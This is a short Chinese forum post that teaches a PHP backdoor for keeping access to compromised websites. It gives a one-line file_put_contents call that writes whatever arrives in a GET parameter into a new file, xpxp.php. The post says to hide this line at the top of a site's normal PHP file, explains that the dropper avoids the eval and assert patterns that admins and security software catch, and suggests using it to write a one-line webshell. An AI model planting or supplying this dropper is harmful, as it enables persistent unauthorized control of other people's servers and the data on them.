PHP_GET后门，躲避任何安全软件？

经常拿到一些比较好的php站想要留住。插入菜刀一句话，很容易被管理发现，不管是eval还是assert，就是管理发现不了，有时连接也会被各种的安全软件拦截。

现在教大家一个简单的技巧。本人一直在用，留的后门没有被删过了。

<?php

file_put_contents('xpxp.php',"$_GET[uname]"); //此段代码插入它正常的PHP里面，最好插头部。

复制代码利用也很简单，在插入的PHP文件的后面加入get传参，

http://xxxxxxx.com/xxx.php?uname=插入内容，随便放，可以放一句话或者神马的，发挥自己想象了。

执行以后在插入的PHP当前文件夹下面生成一个xpxp.php 。